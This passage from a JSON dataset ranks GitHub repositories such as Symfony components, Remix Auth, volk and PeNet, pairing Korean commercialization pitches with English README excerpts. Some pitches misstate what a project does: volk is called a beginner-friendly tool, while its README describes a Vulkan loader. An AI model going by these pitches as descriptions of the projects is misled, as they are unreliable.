90% 이상 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리, 팀 협업 도구 등 회원 인증이 필요한 모든 웹 서비스의 로그인 기능 제공\n2. **내부 업무 도구**: ","readme_excerpt":"![](/assets/header.png)\n\n# Remix Auth\n\n### Simple Authentication for [Remix](https://remix.run) and [React Router](https://reactrouter.com) apps.\n\n## Support the Project\n\nIf you find Remix Auth useful, please consider [sponsoring the project](https://github.com/sponsors/sergiodxa). Your support helps maintain this stable, production-ready library!\n\n## Features\n\n- Full **Server-Side** Authentication\n- Complete **TypeScript** Support\n- **Strategy**-based Authentication\n- Implement **custom** strategies\n\n## Overview\n\nRemix Auth is a complete open-source authentication solution for Remix and React Router applications.\n\nHeavily inspired by [Passport.js](https://passportjs.org), but completely rewrote it from scratch to work on top of the [Web Fetch API](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API). Remix Auth can be dropped in to any Remix or React Router based application with minimal setup.\n\nAs with Passport.js, it uses the strategy pattern to support the different authenti","composite_score":0.0075,"license_safety_tag":"safe"},{"name":"symfony/browser-kit","github_url":"https://github.com/symfony/browser-kit","stars":5,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Symfony Browser-Kit 분석\n\n## 왜 보물인가\n웹사이트의 자동화된 테스트와 모니터링을 위한 핵심 도구로, 개발자 없이도 웹사이트 정상 작동을 자동으로 확인할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 자동 점검 서비스 - 고객의 웹페이지가 24시간 정상 작동하는지 자동으로 감시하고 문제 발생 시 알림\n-","readme_excerpt":"BrowserKit Component\n====================\n\nThe BrowserKit component simulates the behavior of a web browser, allowing you\nto make requests, click on links and submit forms programmatically.\n\nThe component comes with a concrete implementation that uses the HttpClient\ncomponent to make real HTTP requests.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/browser_kit/introduction.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0074,"license_safety_tag":"safe"},{"name":"200ok-ch/organice","github_url":"https://github.com/200ok-ch/organice","stars":11,"language":"JavaScript","license":"AGPL-3.0","abandonment_months":0,"description":"# 200ok-ch/organice 상용화 분석\n\n## 왜 보물인가\n복잡한 문서 작성과 정리를 간단하게 해주는 오픈소스 도구로, 개인이나 팀의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 개인 메모·일정 관리 플랫폼**\n- 월 구독으로 클라우드 저장, 휴대폰/태블릿 동기화 기능 제공\n\n**2. 내부 업무 도구: ","readme_excerpt":"# -*- org-adapt-indentation: nil; fill-column: 70; -*-\n#+title: organice documentation\n\n#+html: <h1 align=\"center\">organice - /'ɔ:gənaɪz/</h1>\n\n#+html: <p align=\"center\"><b>organice organizes Org files nicely!</b></p>\n\n#+html: <p align=\"center\"> <img src=\"https://raw.githubusercontent.com/200ok-ch/organice/master/public/organice-small.png\"/> </p>\n\n* General\n  :PROPERTIES:\n  :CUSTOM_ID: general\n  :END:\n\n** Code\n\n# REPO_PLACEHOLDER\n\n# INFO: We're using inline =#+HTML= notation in favor of the much more\n# readable =#+BEGIN_EXPORT html= notation, because GitHub uses legacy\n# Org parsers and wouldn't render the latter. GitHub would render\n# the legacy notation =#+BEGIN_HTML= which will not be properly\n# exported from Emacs, because it's legacy. Hence the glorious\n# solution: Write all HTML in one line.\n\n#+HTML: <p> <a href=\"https://app.circleci.com/pipelines/github/200ok-ch/organice\"> <img src=\"https://badgen.net/circleci/github/200ok-ch/organice?label=circleci%20master\" /> </a> <a href='#'","composite_score":0.0073,"license_safety_tag":"risky"},{"name":"symfony/password-hasher","github_url":"https://github.com/symfony/password-hasher","stars":7,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Symfony Password-Hasher 분석\n\n## 왜 보물인가\n사용자 비밀번호를 안전하게 보호하는 핵심 기술로, 모든 온라인 서비스에서 필수적인 보안 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원가입/로그인 기능이 있는 웹 애플리케이션(협업 도구, 프로젝트 관리 서비스 등)에 내장\n- **내부 업무 도구**: 회사 직원","readme_excerpt":"PasswordHasher Component\n========================\n\nThe PasswordHasher component provides secure password hashing utilities.\n\nGetting Started\n---------------\n\n```bash\ncomposer require symfony/password-hasher\n```\n\n```php\nuse Symfony\\Component\\PasswordHasher\\Hasher\\PasswordHasherFactory;\n\n// Configure different password hashers via the factory\n$factory = new PasswordHasherFactory([\n    'common' => ['algorithm' => 'bcrypt'],\n    'memory-hard' => ['algorithm' => 'sodium'],\n]);\n\n// Retrieve the right password hasher by its name\n$passwordHasher = $factory->getPasswordHasher('common');\n\n// Hash a plain password\n$hash = $passwordHasher->hash('plain'); // returns a bcrypt hash\n\n// Verify that a given plain password matches the hash\n$passwordHasher->verify($hash, 'wrong'); // returns false\n$passwordHasher->verify($hash, 'plain'); // returns true (valid)\n```\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/security.html#c-hashing-passwords)\n * [Contributing](https://symfony","composite_score":0.0072,"license_safety_tag":"safe"},{"name":"OpenZeppelin/solidity-docgen","github_url":"https://github.com/OpenZeppelin/solidity-docgen","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# OpenZeppelin/solidity-docgen 분석\n\n## 왜 보물인가\n블록체인 코드의 설명서를 자동으로 만들어주는 도구로, 복잡한 암호화폐 계약을 사람들이 쉽게 이해할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 개발사 SaaS**: 암호화폐 프로젝트팀이 구독하여 코드 문서를 자동 생성하는 온라인 서비스\n2. **암호화폐 감시","readme_excerpt":"# `solidity-docgen`\n\n*solidity-docgen is a program that extracts documentation for a Solidity project.*\n\nThe output is fully configurable through Handlebars templates, but the default templates should do a good job of displaying all of the information in the source code in Markdown format. The generated Markdown files can be used with a static site generator such as Vuepress, MkDocs, Jekyll (GitHub Pages), etc., in order to publish a documentation website.\n\nThis is a newer version of the tool that has been rewritten and redesigned. Some more work is pending to ease the transition from the previous version and to help with usage and configuration.\n\n## Usage\n\nInstall `solidity-docgen` from npm.\n\n### Hardhat\n\nInclude the plugin in your Hardhat configuration.\n\n```diff\n // hardhat.config.ts\n+import 'solidity-docgen';\n\n export default {\n+  docgen: { ... }, // if necessary to customize config\n };\n```\n\nThen run with `hardhat docgen`.\n\n### As a library\n\n```typescript\nimport { docgen } from 'sol","composite_score":0.0072,"license_safety_tag":"safe"},{"name":"cristianbote/goober","github_url":"https://github.com/cristianbote/goober","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# Goober 저장소 분석\n\n## 왜 보물인가\n웹사이트 스타일을 간단하게 만들어주는 경량 도구로, 복잡한 설정 없이 빠르게 디자인을 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 업무 관리 도구나 협업 플랫폼의 UI를 빠르게 구축하고 유지보수하는 데 사용\n2. **내부 업무 도구**: 회사 직원들이 사용하는 데이","readme_excerpt":"<p align=\"center\">\n  <img src=\"./goober_cover.png\" width=\"500\" alt=\"goober\" />\n</p>\n\n🥜 goober, a less than 1KB css-in-js solution.\n\n[![Backers on Open Collective](https://opencollective.com/goober/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/goober/sponsors/badge.svg)](#sponsors)\n\n[![version](https://img.shields.io/npm/v/goober)](https://www.npmjs.com/package/goober)\n[![status](https://travis-ci.org/cristianbote/goober.svg?branch=master)](https://travis-ci.org/cristianbote/goober)\n[![gzip size](https://img.badgesize.io/https://unpkg.com/goober@latest/dist/goober.modern.js?compression=gzip)](https://unpkg.com/goober)\n[![downloads](https://img.shields.io/npm/dm/goober)](https://www.npmjs.com/package/goober)\n[![coverage](https://img.shields.io/codecov/c/github/cristianbote/goober.svg?maxAge=2592000)](https://codecov.io/github/cristianbote/goober?branch=master)\n[![Slack](https://img.shields.io/badge/slack-join-orange)](https://join.slack.com/t/go","composite_score":0.0072,"license_safety_tag":"safe"},{"name":"glacambre/firenvim","github_url":"https://github.com/glacambre/firenvim","stars":5,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"# Firenvim 프로젝트 분석\n\n## 왜 보물인가\n웹 브라우저의 텍스트 입력창에서 개인용 편집 프로그램을 바로 열어 더 편하게 글을 쓸 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노션, 구글 독스, 슬랙 같은 웹 기반 업무 도구에 플러그인으로 제공하여 사용자 생산성 향상\n2. **내부 업무 도구**: 기업의 웹 기반 ","readme_excerpt":"# Firenvim  [![Build & Test](https://github.com/glacambre/firenvim/workflows/Test/badge.svg)](https://github.com/glacambre/firenvim/actions?workflow=Test) [![Vint](https://github.com/glacambre/firenvim/workflows/Vint/badge.svg)](https://github.com/glacambre/firenvim/actions?workflow=Vint) [![Luacheck](https://github.com/glacambre/firenvim/workflows/Luacheck/badge.svg)](https://github.com/glacambre/firenvim/actions?workflow=Luacheck) [![Matrix](https://img.shields.io/matrix/firenvim:matrix.org)](https://app.element.io/#/room/#firenvim:matrix.org) [![Wiki](https://img.shields.io/badge/wiki-open-brightgreen)](https://github.com/glacambre/firenvim/wiki)\n\nTurn your browser¹ into a [Neovim][neovim] client (demos: [justinmk 🇺🇸](https://www.youtube.com/watch?v=suvh0yFfIB8), [Sean Feng 🇨🇳](https://www.youtube.com/watch?v=dNQJONKnJrg)).\n\n¹ <sub>Firefox and Chrome are specifically supported. Other Chromium based browsers such as Brave, Vivaldi, Opera, and Arc should also work but are not specific","composite_score":0.0072,"license_safety_tag":"restricted"},{"name":"zeux/volk","github_url":"https://github.com/zeux/volk","stars":6,"language":"C","license":"mit","abandonment_months":0,"description":"# Volk 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 쉽게 사용할 수 있도록 설계된 개발 도구로, 복잡한 기술 작업을 단순화해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 소프트웨어 회사가 개발 비용을 줄일 수 있는 저비용 개발 플랫폼으로 제공\n2. **내부 업무 도구**: 대기업의 IT팀이 반복적인 개발 작업을 자동화","readme_excerpt":"# 🐺 volk [![Build Status](https://github.com/zeux/volk/workflows/build/badge.svg)](https://github.com/zeux/volk/actions) \n\n## Purpose\n\nvolk is a meta-loader for Vulkan. It allows you to dynamically load entrypoints required to use Vulkan\nwithout linking to vulkan-1.dll or statically linking Vulkan loader. Additionally, volk simplifies the use of Vulkan extensions by automatically loading all associated entrypoints. Finally, volk enables loading\nVulkan entrypoints directly from the driver which can increase performance by skipping loader dispatch overhead.\n\nvolk is written in C89 and supports Windows, Linux, Android and macOS (via MoltenVK).\n\n## Building\n\nThere are multiple ways to use volk in your project:\n\n1. You can add `volk.c` to your build system. Note that the usual preprocessor defines that enable Vulkan's platform-specific functions (VK_USE_PLATFORM_WIN32_KHR, VK_USE_PLATFORM_XLIB_KHR, VK_USE_PLATFORM_MACOS_MVK, etc) must be passed as desired to the compiler when building `volk","composite_score":0.0071,"license_safety_tag":"safe"},{"name":"symfony/yaml","github_url":"https://github.com/symfony/yaml","stars":8,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Symfony YAML 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 설정 정보를 간단한 텍스트 형식으로 관리할 수 있게 해주는 널리 사용되는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 업로드한 YAML 파일을 자동으로 읽어서 서비스 설정을 적용하는 플랫폼\n2. **내부 업무 도구**: 직원들이 쉽게 수정할 수 있는","readme_excerpt":"Yaml Component\n==============\n\nThe Yaml component loads and dumps YAML files.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/yaml.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0071,"license_safety_tag":"safe"},{"name":"webmozart/assert","github_url":"https://github.com/webmozart/assert","stars":10,"language":"PHP","license":"mit","abandonment_months":0,"description":"# WebMozart Assert 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 코드 오류를 빠르게 찾아내도록 돕는 검증 도구로, 버그로 인한 손실을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 금융 관리 앱이나 전자상거래 플랫폼에서 결제 금액, 사용자 정보 등이 정확한지 자동으로 확인하는 기능\n2. **내부 업무 도","readme_excerpt":"Webmozart Assert\n================\n\n[![Latest Stable Version](https://poser.pugx.org/webmozart/assert/v/stable.svg)](https://packagist.org/packages/webmozart/assert)\n[![Total Downloads](https://poser.pugx.org/webmozart/assert/downloads.svg)](https://packagist.org/packages/webmozart/assert)\n\nThis library contains efficient assertions to test the input and output of\nyour methods. With these assertions, you can greatly reduce the amount of coding\nneeded to write a safe implementation.\n\nAll assertions in the [`Assert`] class throw an `Webmozart\\Assert\\InvalidArgumentException` if\nthey fail.\n\nFAQ\n---\n\n**What's the difference to [beberlei/assert]?**\n\nThis library is heavily inspired by Benjamin Eberlei's wonderful [assert package],\nbut fixes a usability issue with error messages that can't be fixed there without\nbreaking backwards compatibility.\n\nThis package features usable error messages by default. However, you can also\neasily write custom error messages:\n\n```\nAssert::string($path, 'The pa","composite_score":0.0071,"license_safety_tag":"safe"},{"name":"helio-fm/helio-workstation","github_url":"https://github.com/helio-fm/helio-workstation","stars":10,"language":"C++","license":"GPL-3.0","abandonment_months":0,"description":"# Helio Workstation 상업화 분석\n\n## 왜 보물인가\n누구나 쉽게 음악을 만들 수 있는 무료 음악 제작 소프트웨어로, 전문가용 도구를 대중화할 수 있는 기반을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 제작 SaaS**: 클라우드 기반 음악 편집 서비스로 구독료를 받으면서 사용자 데이터 분석으로 수익화\n2. **콘텐츠 크리에이","readme_excerpt":"[Helio](https://helio.fm) is a free and open-source music sequencer for desktop and mobile platforms:\n\n![On desktop (Windows)](Docs/images/screen-v3.png)\n\n![On smartphone (Pixel 6a)](Docs/images/screen-v3-android.png)\n\n![On tablet (iPad mini)](Docs/images/screen-v3-ios.png)\n\n## Why another sequencer?\n\nMost of the DAW interfaces often seem overcomplicated, and they only tend to get more and more bloated over time. Many of them are commercial, proprietary-licensed and almost none of them support all major operating systems at the same time.\n\nHelio is an attempt to rethink a music sequencer to create a tool that **feels right**.\n\nIt aims to be a modern music creation software, featuring linear-based/pattern-based sequencer with clean UI, integrated version control, microtonal temperaments support, small portable builds and more; mainly targeted at hobbyist composers, game developers and indie artists. Check out this [YouTube channel](https://www.youtube.com/channel/UCO3K8iCd1k2FTqSocoE-WX","composite_score":0.007,"license_safety_tag":"restricted"},{"name":"laravel/tinker","github_url":"https://github.com/laravel/tinker","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Laravel Tinker 평가 보고서\n\n## 왜 보물인가\n프로그래머들이 웹사이트 코드를 직접 테스트하고 수정할 수 있는 도구로, 개발 시간을 획기적으로 단축시켜줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발사의 내부 업무 도구**: 클라이언트 웹사이트 버그 수정 시 코드를 즉시 테스트하고 적용하는 플랫폼\n2. **온라인 코딩 학습 플랫폼**: 학","readme_excerpt":"<p align=\"center\"><img width=\"321\" height=\"80\" src=\"/art/logo.svg\" alt=\"Logo Laravel Tinker\"></p>\n\n<p align=\"center\">\n<a href=\"https://github.com/laravel/tinker/actions\"><img src=\"https://github.com/laravel/tinker/workflows/tests/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://packagist.org/packages/laravel/tinker\"><img src=\"https://img.shields.io/packagist/dt/laravel/tinker\" alt=\"Total Downloads\"></a>\n<a href=\"https://packagist.org/packages/laravel/tinker\"><img src=\"https://img.shields.io/packagist/v/laravel/tinker\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/laravel/tinker\"><img src=\"https://img.shields.io/packagist/l/laravel/tinker\" alt=\"License\"></a>\n</p>\n\n## Introduction\n\nLaravel Tinker is a powerful REPL for the Laravel framework.\n\n## Official Documentation\n\nDocumentation for Tinker can be found on the [Laravel website](https://laravel.com/docs/artisan#tinker).\n\n## Contributing\n\nThank you for considering contributing to Tinker! The contribution gu","composite_score":0.0069,"license_safety_tag":"safe"},{"name":"flomesh-io/pipy","github_url":"https://github.com/flomesh-io/pipy","stars":8,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# Pipy 저장소 분석\n\n## 왜 보물인가\n인터넷 통신을 중간에서 제어하고 최적화하는 기술로, 기업의 네트워크 성능과 보안을 동시에 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. API 관리 SaaS 서비스**\n- 기업들의 웹 서비스 요청을 중간에서 검사하고 제어하는 클라우드 서비스로 제공\n\n**2. 기업 내부 네트워크 보안 도구**\n- 회","readme_excerpt":"![Pipy Logo](./gui/src/images/pipy-300.png)\n\n[中文](./README_zh.md) | [日本語](./README_jp.md)\n\n# Pipy\n\nPipy is a programmable proxy for the cloud, edge and IoT. It's written in C++, which makes it extremely lightweight and fast. It's also fully programmable by using _PipyJS_, a tailored version from the standard JavaScript language.\n\n## Why Pipy?\n\n### Versatile\n\nAlthough Pipy is mostly used as a high-performance reverse proxy, the real power of Pipy relies on providing you a range of basic pluggable building blocks, aka. \"_filters_\", and not imposing any restrictions on how you combine them. It's entirely up to you. We've seen people using Pipy to convert protocols, record network traffic, sign/verify messages, trigger serverless functions, health-check servers, and more.\n\n### Fast\n\nPipy is written in C++. It leverages asynchronous network I/O. Allocated resources are pooled and reused. Data is transferred internally by pointers whenever possible. It's fast in every way.\n\n### Tiny\n\nA build","composite_score":0.0068,"license_safety_tag":"unknown"},{"name":"symfony/css-selector","github_url":"https://github.com/symfony/css-selector","stars":9,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Symfony CSS Selector 상용화 분석\n\n## 왜 보물인가\n웹사이트의 스타일을 찾아 수정하는 핵심 기술을 제공하는 오픈소스 도구로, 수많은 웹 서비스 개발사들이 의존하고 있는 신뢰할 수 있는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n- **웹사이트 자동화 도구**: 사용자가 원하는 웹페이지 영역을 자동으로 찾아 데이터를 추출하거나 수정하는","readme_excerpt":"CssSelector Component\n=====================\n\nThe CssSelector component converts CSS selectors to XPath expressions.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/css_selector.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n\nCredits\n-------\n\nThis component is a port of the Python cssselect library\n[v0.7.1](https://github.com/SimonSapin/cssselect/releases/tag/v0.7.1),\nwhich is distributed under the BSD license.\n","composite_score":0.0068,"license_safety_tag":"safe"},{"name":"conao3/leaf.el","github_url":"https://github.com/conao3/leaf.el","stars":5,"language":"Emacs Lisp","license":"GPL-3.0","abandonment_months":1,"description":"# leaf.el 분석 보고서\n\n## 왜 보물인가\n텍스트 편집기에서 문서 작성 시 반복되는 작업을 자동화하여 업무 생산성을 크게 향상시킬 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기자/콘텐츠 작가용 SaaS**\n- 기사 작성 시 템플릿 자동 적용 및 편집 자동화 기능을 구독 서비스로 제공\n\n**2. 기업 문서 관리 내부 도구**\n- 회사 ","readme_excerpt":"[![img](https://raw.githubusercontent.com/conao3/files/master/blob/headers/png/leaf.el.png)](https://github.com/conao3/leaf.el) [![img](https://img.shields.io/github/license/conao3/leaf.el.svg?style=flat-square)](https://github.com/conao3/leaf.el/blob/master/LICENSE) [![img](https://img.shields.io/github/tag/conao3/leaf.el.svg?style=flat-square)](https://github.com/conao3/leaf.el/releases) [![img](https://img.shields.io/travis/conao3/leaf.el/master.svg?style=flat-square)](https://travis-ci.org/conao3/leaf.el) [![img](https://img.shields.io/codacy/grade/3ad51a9fc08e48f98b6eb75f8571f0b0.svg?logo=codacy&style=flat-square)](https://app.codacy.com/project/conao3/leaf.el/dashboard) [![img](https://img.shields.io/badge/patreon-become%20a%20patron-orange.svg?logo=patreon&style=flat-square)](https://www.patreon.com/conao3) [![img](https://img.shields.io/badge/twitter-@conao__3-blue.svg?logo=twitter&style=flat-square)](https://twitter.com/conao_3) [![img](https://img.shields.io/badge/chat-on_sla","composite_score":0.0067,"license_safety_tag":"restricted"},{"name":"symfony/dom-crawler","github_url":"https://github.com/symfony/dom-crawler","stars":6,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Symfony DOM Crawler 상용화 분석\n\n## 왜 보물인가\n웹사이트의 정보를 자동으로 수집하고 분석할 수 있는 도구로, 경쟁사 모니터링이나 데이터 수집이 필요한 기업들에게 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **가격 모니터링 SaaS**: 경쟁사 웹사이트 가격을 자동으로 추적하고 알람을 보내는 서비스\n2. **채용공고 집계 플랫폼","readme_excerpt":"DomCrawler Component\n====================\n\nThe DomCrawler component eases DOM navigation for HTML and XML documents.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/dom_crawler.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0067,"license_safety_tag":"safe"},{"name":"bitdotgames/bhl","github_url":"https://github.com/bitdotgames/bhl","stars":5,"language":"C#","license":"unknown","abandonment_months":1,"description":"# bitdotgames/bhl 저장소 분석\n\n## 왜 보물인가\n저장소 이름과 설명 정보 부족으로 실질적 가치를 판단하기 어려우며, 5개의 낮은 스타 수는 아직 시장에서 검증되지 않은 초기 프로젝트임을 시사합니다.\n\n## 어디에 쓸 수 있나\n- **게임 개발사 내부 도구**: 게임 제작 과정에서 필요한 자동화 작업 처리\n- **게임 회사 간 기술 라이센싱*","readme_excerpt":"# **B**ehaviour **H**ighlevel **L**anguage\n\n![CI](https://github.com/bitdotgames/bhl/actions/workflows/main.yml/badge.svg)\n\n> **BHL** is a strictly typed programming language specifically tailored for gameplay logic scripting. It combines pseudo parallel execution primitives with familiar imperative coding style.\n\nFirst time it was presented at the [nucl.ai](https://nucl.ai/) conference in 2016. Here's the [presentation slides](https://docs.google.com/presentation/d/1As-bw3pY5pLij86j7nf_ycaG0Hb2EqnrwR3R8ID47sQ/edit?usp=sharing). \n\nPlease note that BHL is in beta state and currently targets only C# platform. Nonetheless it has been battle tested in the real world projects and heavily used by BIT.GAMES for mobile games development built with [Unity](https://unity.com/).\n\n## BHL features\n\n* [ANTLR](http://www.antlr.org/) based: C# frontend + C# interpreting backend\n* Statically typed\n* Cooperative multitasking support\n* Built-in support for pseudo parallel code orchestration\n* Golang alik","composite_score":0.0067,"license_safety_tag":"unknown"},{"name":"semperfiwebdesign/all-in-one-seo-pack","github_url":"https://github.com/semperfiwebdesign/all-in-one-seo-pack","stars":12,"language":"JavaScript","license":"gpl-2.0","abandonment_months":0,"description":"# All-in-One SEO Pack 저장소 분석\n\n## 왜 보물인가\n검색 엔진 최적화(SEO) 기능을 한 번에 처리할 수 있는 완성된 도구로, 웹사이트 검색 순위를 높이고 싶은 사람들에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 사업가를 위한 웹사이트 검색 최적화 자동 관리 구독 서비스\n- **내부 업무 도구**: 기","readme_excerpt":"# all-in-one-seo-pack\n\n## Project setup\n```\nnpm install\n```\n\n### Compiles and hot-reloads for development (Lite)\n```\nnpm run dev:lite\n```\n\n### Compiles and hot-reloads for development (Pro)\n```\nnpm run dev:pro\n```\n\n### Compiles and minifies for production (Lite)\n```\nnpm run build:lite\n```\n\n### Compiles and minifies for production (Pro)\n```\nnpm run build:pro\n```\n\n### Customize configuration\nSee [Configuration Reference](https://vitejs.dev/config/).","composite_score":0.0066,"license_safety_tag":"restricted"},{"name":"secana/PeNet","github_url":"https://github.com/secana/PeNet","stars":5,"language":"C#","license":"apache-2.0","abandonment_months":0,"description":"# PeNet 저장소 분석\n\n## 왜 보물인가\n윈도우 실행파일의 숨겨진 정보를 자동으로 분석해주는 도구로, 보안 위협 탐지나 프로그램 검증이 필요한 모든 조직에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인에서 다운로드한 프로그램이 안전한지 자동 검사해주는 파일 검증 플랫폼\n2. **내부 업무 도구**: 기업의 컴퓨터에 설","readme_excerpt":"[![license](https://img.shields.io/github/license/secana/penet.svg)](https://raw.githubusercontent.com/secana/PeNet/master/LICENSE)\n[![NuGet](https://img.shields.io/nuget/v/PeNet.svg)](https://www.nuget.org/packages/PeNet/)\n[![NuGet](https://img.shields.io/nuget/dt/PeNet.svg)](https://www.nuget.org/packages/PeNet/)\n[![Build](https://img.shields.io/azure-devops/build/secana/PeNet/2.svg)](https://dev.azure.com/secana/PeNet/_build?definitionId=2)\n[![Test](https://img.shields.io/azure-devops/tests/secana/PeNet/2.svg)](https://dev.azure.com/secana/PeNet/_build?definitionId=2)\n[![BuiltWithDot.Net shield](https://builtwithdot.net/project/492/penet-csharp-net-standard-file-parser/badge)](https://builtwithdot.net/project/492/penet-csharp-net-standard-file-parser)\n\n![PeNet Logo](https://raw.githubusercontent.com/secana/PeNet/master/resource/linkedin_banner_image_2.png \"PeNet - PE analysis made easy\")\nPeNet is a parser for Windows Portable Executable headers. It completely written in C# and does ","composite_score":0.0066,"license_safety_tag":"safe"},{"name":"mosecorg/mosec","github_url":"https://github.com/mosecorg/mosec","stars":15,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# MOSEC 저장소 분석\n\n## 왜 보물인가\n인공지능 모델을 안전하게 배포하고 관리할 수 있는 플랫폼으로, AI 서비스를 만드는 기업들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 이미지 생성 SaaS**: 사용자의 사진을 분석하는 온라인 서비스를 안정적으로 운영하는 백엔드 시스템\n2. **금융사 내부 도구**: 은행의 신용","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://user-images.githubusercontent.com/38581401/240117836-f06199ba-c80d-413a-9cb4-5adc76316bda.png\" width=90% alt=\"MOSEC\" />\n</p>\n\n<p align=\"center\">\n  <a href=\"https://discord.gg/Jq5vxuH69W\">\n    <img alt=\"discord invitation link\" src=\"https://img.shields.io/discord/916177932236521533?style=flat&logo=discord&color=blue&cacheSeconds=60\">\n  </a>\n  <a href=\"https://pypi.org/project/mosec/\">\n    <img src=\"https://img.shields.io/pypi/v/mosec?style=flat&logo=python&color=blue&cacheSeconds=60\" alt=\"PyPI version\" height=\"20\">\n  </a>\n  <a href=\"https://anaconda.org/conda-forge/mosec\">\n    <img src=\"https://anaconda.org/conda-forge/mosec/badges/version.svg\" alt=\"conda-forge\">\n  </a>\n  <a href=\"https://pypi.org/project/mosec\">\n    <img src=\"https://img.shields.io/pypi/pyversions/mosec\" alt=\"Python Version\" />\n  </a>\n  <a href=\"https://pepy.tech/project/mosec\">\n    <img src=\"https://static.pepy.tech/badge/mosec/month\" alt=\"PyPi monthly Downloads\" height=\"20\">\n  <","composite_score":0.0066,"license_safety_tag":"safe"},{"name":"skywind3000/vim-quickui","github_url":"https://github.com/skywind3000/vim-quickui","stars":5,"language":"Vim Script","license":"MIT","abandonment_months":1,"description":"# vim-quickui 분석 보고서\n\n## 왜 보물인가\n텍스트 편집기(Vim)에서 마우스 클릭으로 메뉴를 사용할 수 있게 만드는 도구로, 복잡한 명령어를 외우지 않아도 직관적으로 작업할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 생산성 도구 SaaS**: Vim 사용자를 위한 구독형 플러그인 마켓플레이스 제공\n2. **기업 코딩 교육 플랫","readme_excerpt":"# vim-quickui\r\n\r\n[![GitHub Stars](https://img.shields.io/github/stars/skywind3000/vim-quickui?style=flat-square&logo=github)](https://github.com/skywind3000/vim-quickui/stargazers)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg?style=flat-square)](LICENSE)\r\n[![Vim](https://img.shields.io/badge/Vim-8.2+-green.svg?style=flat-square&logo=vim)](https://www.vim.org)\r\n[![NeoVim](https://img.shields.io/badge/NeoVim-0.4+-green.svg?style=flat-square&logo=neovim)](https://neovim.io)\r\n\r\nBorland/Turbo C++ inspired TUI widget library for Vim and NeoVim — menus, dialogs, context menus and more, all in pure VimScript with no dependencies.\r\n\r\n![](https://skywind3000.github.io/images/p/quickui/screenshot.gif)\r\n\r\n## Features\r\n\r\n- **Rich widget set** — menubar, context menu, data-driven dialog, listbox, textbox, preview window, and more\r\n- **Data-driven dialog system** — declare UI controls as data, get results as a dictionary\r\n- **Cross-platform** — consistent experience across Vim ","composite_score":0.0065,"license_safety_tag":"safe"},{"name":"wx-chevalier/Web-Series","github_url":"https://github.com/wx-chevalier/Web-Series","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":0,"description":"# Web-Series 저장소 분석\n\n## 왜 보물인가\n웹 개발에 필요한 다양한 기술과 지식을 체계적으로 정리한 학습 자료 모음으로, 웹 서비스를 만들고 싶은 사람들의 진입장벽을 낮춰줄 수 